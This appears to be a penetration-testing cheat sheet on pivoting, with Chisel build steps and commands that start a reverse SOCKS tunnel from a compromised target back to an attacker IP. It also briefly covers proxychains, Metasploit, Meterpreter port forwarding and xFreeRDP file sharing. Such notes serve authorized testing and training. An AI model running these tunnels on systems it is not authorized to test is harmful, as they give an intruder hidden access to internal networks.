Pivoting and Portforwarding
Chisel
Install
# Clone Repository
git clone 'https://github.com/jpillora/chisel.git'
# Build Binary
go build
# Binary is now built and ready to be transfered over to target system.Reverse SOCKS proxy
# Attacking Machine
./chisel server -p <Port> --reverse &
./chisel server -p 1337 --reverse &
# On Target Machine
./chisel client <Attacking-IP>:<Port> R:socks &
./chisel client 10.50.46.8:1337 R:socks &
# Then use Proxychains to scan internal networks from the compromised host.Shuttle
SSH
Metasploit with Proxychains
Change last line in /etc/proxychains4.conf to the following value: socks5 127.0.0.1 1080
Then use the following Metasploit module:
Set module options to the following (Default):
We can then force applications to use proxychains by initiating commands with the command proxychains first.
Double Pivot
Port Forward
Meterpreter can be used to portforward for access to file shares and web servers.
Essentially as per the example command above we could connect to RDP on our local port in order to hit the remote port.
xFreeRDP
Whilst not a direct pivoting technique, using xFreeRDP to share the hosts file system can give the attacker an easy route for moving files across systems to further assist with pivoting

Tools
Chisel: https://github.com/jpillora/chisel/releases/tag/v1.7.6
References
Last updated